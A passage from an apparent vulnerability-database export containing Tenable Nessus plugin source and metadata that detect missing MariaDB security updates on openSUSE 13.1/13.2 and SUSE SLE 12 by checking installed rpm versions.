value:\n\"MariaDB was updated to 10.0.22 to fix 
security issues and bugs.\n\nThe following vulnerabilities were fixed in the upstream release :\n\nCVE-2015-4802, CVE-2015-4807, CVE-2015-4815, CVE-2015-4826,\nCVE-2015-4830, CVE-2015-4836, CVE-2015-4858, CVE-2015-4861,\nCVE-2015-4870, CVE-2015-4913, CVE-2015-4792\n\nA list of upstream changes and release notes can be found here :\n\n- https://kb.askmonty.org/en/mariadb-10022-release-notes/\n\n- https://kb.askmonty.org/en/mariadb-10022-changelog/\n\nThe following build problems were fixed :\n\n - bsc#937787: fix main.bootstrap test (change default\n charset to utf8 in test result)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=937787\"\n );\n # https://kb.askmonty.org/en/mariadb-10022-changelog/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://mariadb.com/kb/en/library/mariadb-10022-changelog/\"\n );\n # https://kb.askmonty.org/en/mariadb-10022-release-notes/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://mariadb.com/kb/en/library/mariadb-10022-release-notes/\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected mariadb packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:S/C:N/I:N/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libmysqlclient-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libmysqlclient18\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libmysqlclient18-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libmysqlclient18-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libmysqlclient18-debuginfo-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libmysqlclient_r18\");\n script_set_attribute(attribute:\"cpe\", 
value:\"p-cpe:/a:novell:opensuse:libmysqlclient_r18-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libmysqld-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libmysqld18\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libmysqld18-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:mariadb\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:mariadb-bench\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:mariadb-bench-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:mariadb-client\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:mariadb-client-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:mariadb-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:mariadb-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:mariadb-errormessages\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:mariadb-test\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:mariadb-test-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:mariadb-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:mariadb-tools-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:13.2\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/12/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/12/17\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE13\\.2)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"13.2\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE13.2\", reference:\"libmysqlclient-devel-10.0.22-2.18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"libmysqlclient18-10.0.22-2.18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"libmysqlclient18-debuginfo-10.0.22-2.18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"libmysqlclient_r18-10.0.22-2.18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"libmysqld-devel-10.0.22-2.18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"libmysqld18-10.0.22-2.18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"libmysqld18-debuginfo-10.0.22-2.18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"mariadb-10.0.22-2.18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"mariadb-bench-10.0.22-2.18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"mariadb-bench-debuginfo-10.0.22-2.18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"mariadb-client-10.0.22-2.18.1\") ) 
flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"mariadb-client-debuginfo-10.0.22-2.18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"mariadb-debuginfo-10.0.22-2.18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"mariadb-debugsource-10.0.22-2.18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"mariadb-errormessages-10.0.22-2.18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"mariadb-test-10.0.22-2.18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"mariadb-test-debuginfo-10.0.22-2.18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"mariadb-tools-10.0.22-2.18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"mariadb-tools-debuginfo-10.0.22-2.18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", cpu:\"x86_64\", reference:\"libmysqlclient18-32bit-10.0.22-2.18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", cpu:\"x86_64\", reference:\"libmysqlclient18-debuginfo-32bit-10.0.22-2.18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", cpu:\"x86_64\", reference:\"libmysqlclient_r18-32bit-10.0.22-2.18.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"libmysqlclient-devel / libmysqlclient18 / libmysqlclient18-32bit / etc\");\n}\n", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:N/I:N/A:P"}}, {"lastseen": "2021-01-20T12:28:58", "description": "MariaDB was updated to 5.5.46 to fix security issues and bugs.\n\nThe following vulnerabilities were fixed in the upstream release :\n\nCVE-2015-4802, CVE-2015-4807, CVE-2015-4815, CVE-2015-4826,\nCVE-2015-4830, CVE-2015-4836, CVE-2015-4858, CVE-2015-4861,\nCVE-2015-4870, CVE-2015-4913, CVE-2015-4792 \n\nA list of upstream changes and release notes can be found 
here:\nhttps://mariadb.com/kb/en/mariadb/mariadb-5546-release-notes/\nhttps://mariadb.com/kb/en/mariadb/mariadb-5546-changelog/", "edition": 18, "published": "2015-12-18T00:00:00", "title": "openSUSE Security Update : MariaDB 5.5.46 (openSUSE-2015-890)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-4830", "CVE-2015-4913", "CVE-2015-4858", "CVE-2015-4802", "CVE-2015-4815", "CVE-2015-4792", "CVE-2015-4807", "CVE-2015-4836", "CVE-2015-4861", "CVE-2015-4870", "CVE-2015-4826"], "modified": "2015-12-18T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:mariadb-errormessages", "p-cpe:/a:novell:opensuse:mariadb-client", "p-cpe:/a:novell:opensuse:libmysqld-devel", "p-cpe:/a:novell:opensuse:mariadb-tools", "p-cpe:/a:novell:opensuse:mariadb-test-debuginfo", "p-cpe:/a:novell:opensuse:libmysqlclient18", "p-cpe:/a:novell:opensuse:mariadb-bench-debuginfo", "p-cpe:/a:novell:opensuse:mariadb-debugsource", "p-cpe:/a:novell:opensuse:libmysqlclient_r18-32bit", "p-cpe:/a:novell:opensuse:mariadb-tools-debuginfo", "p-cpe:/a:novell:opensuse:libmysqld18", "p-cpe:/a:novell:opensuse:libmysqlclient-devel", "p-cpe:/a:novell:opensuse:mariadb-debuginfo", "p-cpe:/a:novell:opensuse:libmysqlclient_r18", "p-cpe:/a:novell:opensuse:mariadb-client-debuginfo", "p-cpe:/a:novell:opensuse:libmysqld18-debuginfo", "p-cpe:/a:novell:opensuse:mariadb", "p-cpe:/a:novell:opensuse:mariadb-test", "p-cpe:/a:novell:opensuse:libmysqlclient18-32bit", "p-cpe:/a:novell:opensuse:mariadb-bench", "cpe:/o:novell:opensuse:13.1", "p-cpe:/a:novell:opensuse:libmysqlclient18-debuginfo", "p-cpe:/a:novell:opensuse:libmysqlclient18-debuginfo-32bit"], "id": "OPENSUSE-2015-890.NASL", "href": "https://www.tenable.com/plugins/nessus/87486", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2015-890.\n#\n# The text description of this plugin is (C) SUSE 
LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(87486);\n script_version(\"2.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2015-4792\", \"CVE-2015-4802\", \"CVE-2015-4807\", \"CVE-2015-4815\", \"CVE-2015-4826\", \"CVE-2015-4830\", \"CVE-2015-4836\", \"CVE-2015-4858\", \"CVE-2015-4861\", \"CVE-2015-4870\", \"CVE-2015-4913\");\n\n script_name(english:\"openSUSE Security Update : MariaDB 5.5.46 (openSUSE-2015-890)\");\n script_summary(english:\"Check for the openSUSE-2015-890 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"MariaDB was updated to 5.5.46 to fix security issues and bugs.\n\nThe following vulnerabilities were fixed in the upstream release :\n\nCVE-2015-4802, CVE-2015-4807, CVE-2015-4815, CVE-2015-4826,\nCVE-2015-4830, CVE-2015-4836, CVE-2015-4858, CVE-2015-4861,\nCVE-2015-4870, CVE-2015-4913, CVE-2015-4792 \n\nA list of upstream changes and release notes can be found here:\nhttps://mariadb.com/kb/en/mariadb/mariadb-5546-release-notes/\nhttps://mariadb.com/kb/en/mariadb/mariadb-5546-changelog/\"\n );\n # https://mariadb.com/kb/en/mariadb/mariadb-5546-changelog/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://mariadb.com/kb/en/library/mariadb-5546-changelog/\"\n );\n # https://mariadb.com/kb/en/mariadb/mariadb-5546-release-notes/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://mariadb.com/kb/en/library/mariadb-5546-release-notes/\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected MariaDB 5.5.46 packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:S/C:N/I:N/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", 
value:\"p-cpe:/a:novell:opensuse:libmysqlclient-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libmysqlclient18\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libmysqlclient18-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libmysqlclient18-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libmysqlclient18-debuginfo-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libmysqlclient_r18\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libmysqlclient_r18-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libmysqld-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libmysqld18\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libmysqld18-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:mariadb\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:mariadb-bench\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:mariadb-bench-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:mariadb-client\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:mariadb-client-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:mariadb-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:mariadb-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:mariadb-errormessages\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:mariadb-test\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:mariadb-test-debuginfo\");\n script_set_attribute(attribute:\"cpe\", 
value:\"p-cpe:/a:novell:opensuse:mariadb-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:mariadb-tools-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:13.1\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/10/21\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/12/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/12/18\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE13\\.1)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"13.1\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE13.1\", reference:\"libmysqlclient-devel-5.5.46-13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"libmysqlclient18-5.5.46-13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"libmysqlclient18-debuginfo-5.5.46-13.1\") ) flag++;\nif ( 
rpm_check(release:\"SUSE13.1\", reference:\"libmysqlclient_r18-5.5.46-13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"libmysqld-devel-5.5.46-13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"libmysqld18-5.5.46-13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"libmysqld18-debuginfo-5.5.46-13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"mariadb-5.5.46-13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"mariadb-bench-5.5.46-13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"mariadb-bench-debuginfo-5.5.46-13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"mariadb-client-5.5.46-13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"mariadb-client-debuginfo-5.5.46-13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"mariadb-debuginfo-5.5.46-13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"mariadb-debugsource-5.5.46-13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"mariadb-errormessages-5.5.46-13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"mariadb-test-5.5.46-13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"mariadb-test-debuginfo-5.5.46-13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"mariadb-tools-5.5.46-13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"mariadb-tools-debuginfo-5.5.46-13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"x86_64\", reference:\"libmysqlclient18-32bit-5.5.46-13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"x86_64\", reference:\"libmysqlclient18-debuginfo-32bit-5.5.46-13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"x86_64\", reference:\"libmysqlclient_r18-32bit-5.5.46-13.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = 
pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"libmysqlclient-devel / libmysqlclient18-32bit / libmysqlclient18 / etc\");\n}\n", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:N/I:N/A:P"}}, {"lastseen": "2021-01-07T14:23:29", "description": "MariaDB has been updated to version 10.0.22, which brings fixes for\nmany security issues and other improvements.\n\nThe following CVEs have been fixed :\n\n - 10.0.22: CVE-2015-4802, CVE-2015-4807, CVE-2015-4815,\n CVE-2015-4826, CVE-2015-4830, CVE-2015-4836,\n CVE-2015-4858, CVE-2015-4861, CVE-2015-4870,\n CVE-2015-4913, CVE-2015-4792\n\n - Fix information leak via mysql-systemd-helper script.\n (CVE-2015-5969, bsc#957174)\n\nFor a comprehensive list of changes refer to the upstream Release\nNotes and Change Log documents :\n\n- https://kb.askmonty.org/en/mariadb-10022-release-notes/\n\n- https://kb.askmonty.org/en/mariadb-10022-changelog/\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 28, "cvss3": {"score": 6.2, "vector": "AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"}, "published": "2016-02-02T00:00:00", "title": "SUSE SLED12 / SLES12 Security Update : mariadb (SUSE-SU-2016:0296-1)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-4830", "CVE-2015-4913", "CVE-2015-4858", "CVE-2015-4802", "CVE-2015-4815", "CVE-2015-5969", "CVE-2015-4792", "CVE-2015-4807", "CVE-2015-4836", "CVE-2015-4861", "CVE-2015-4870", "CVE-2015-4826"], "modified": "2016-02-02T00:00:00", "cpe": ["cpe:/o:novell:suse_linux:12", "p-cpe:/a:novell:suse_linux:mariadb-errormessages", "p-cpe:/a:novell:suse_linux:mariadb-client-debuginfo", "p-cpe:/a:novell:suse_linux:libmysqlclient_r18", "p-cpe:/a:novell:suse_linux:mariadb-client", "p-cpe:/a:novell:suse_linux:mariadb-debugsource", "p-cpe:/a:novell:suse_linux:libmysqlclient18-debuginfo", "p-cpe:/a:novell:suse_linux:mariadb", "p-cpe:/a:novell:suse_linux:mariadb-debuginfo", "p-cpe:/a:novell:suse_linux:mariadb-tools", "p-cpe:/a:novell:suse_linux:libmysqlclient18", "p-cpe:/a:novell:suse_linux:mariadb-tools-debuginfo"], "id": "SUSE_SU-2016-0296-1.NASL", "href": "https://www.tenable.com/plugins/nessus/88515", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2016:0296-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(88515);\n script_version(\"2.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2015-4792\", \"CVE-2015-4802\", \"CVE-2015-4807\", \"CVE-2015-4815\", \"CVE-2015-4826\", \"CVE-2015-4830\", \"CVE-2015-4836\", \"CVE-2015-4858\", \"CVE-2015-4861\", \"CVE-2015-4870\", \"CVE-2015-4913\", 
\"CVE-2015-5969\");\n\n script_name(english:\"SUSE SLED12 / SLES12 Security Update : mariadb (SUSE-SU-2016:0296-1)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SUSE host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"MariaDB has been updated to version 10.0.22, which brings fixes for\nmany security issues and other improvements.\n\nThe following CVEs have been fixed :\n\n - 10.0.22: CVE-2015-4802, CVE-2015-4807, CVE-2015-4815,\n CVE-2015-4826, CVE-2015-4830, CVE-2015-4836,\n CVE-2015-4858, CVE-2015-4861, CVE-2015-4870,\n CVE-2015-4913, CVE-2015-4792\n\n - Fix information leak via mysql-systemd-helper script.\n (CVE-2015-5969, bsc#957174)\n\nFor a comprehensive list of changes refer to the upstream Release\nNotes and Change Log documents :\n\n- https://kb.askmonty.org/en/mariadb-10022-release-notes/\n\n- https://kb.askmonty.org/en/mariadb-10022-changelog/\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=937787\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=957174\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=958789\"\n );\n # https://kb.askmonty.org/en/mariadb-10022-changelog/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://mariadb.com/kb/en/library/mariadb-10022-changelog/\"\n );\n # https://kb.askmonty.org/en/mariadb-10022-release-notes/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://mariadb.com/kb/en/library/mariadb-10022-release-notes/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2015-4792/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2015-4802/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2015-4807/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2015-4815/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2015-4826/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2015-4830/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2015-4836/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2015-4858/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2015-4861/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n 
value:\"https://www.suse.com/security/cve/CVE-2015-4870/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2015-4913/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2015-5969/\"\n );\n # https://www.suse.com/support/update/announcement/2016/suse-su-20160296-1/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?3caabc9c\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"To install this SUSE Security Update use YaST online_update.\nAlternatively you can run the command listed for your product :\n\nSUSE Linux Enterprise Workstation Extension 12-SP1 :\n\nzypper in -t patch SUSE-SLE-WE-12-SP1-2016-183=1\n\nSUSE Linux Enterprise Software Development Kit 12-SP1 :\n\nzypper in -t patch SUSE-SLE-SDK-12-SP1-2016-183=1\n\nSUSE Linux Enterprise Server 12-SP1 :\n\nzypper in -t patch SUSE-SLE-SERVER-12-SP1-2016-183=1\n\nSUSE Linux Enterprise Desktop 12-SP1 :\n\nzypper in -t patch SUSE-SLE-DESKTOP-12-SP1-2016-183=1\n\nTo bring your system up-to-date, use 'zypper patch'.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:S/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libmysqlclient18\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libmysqlclient18-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libmysqlclient_r18\");\n 
script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:mariadb\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:mariadb-client\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:mariadb-client-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:mariadb-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:mariadb-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:mariadb-errormessages\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:mariadb-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:mariadb-tools-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:12\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/10/21\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/02/01\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/02/02\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is 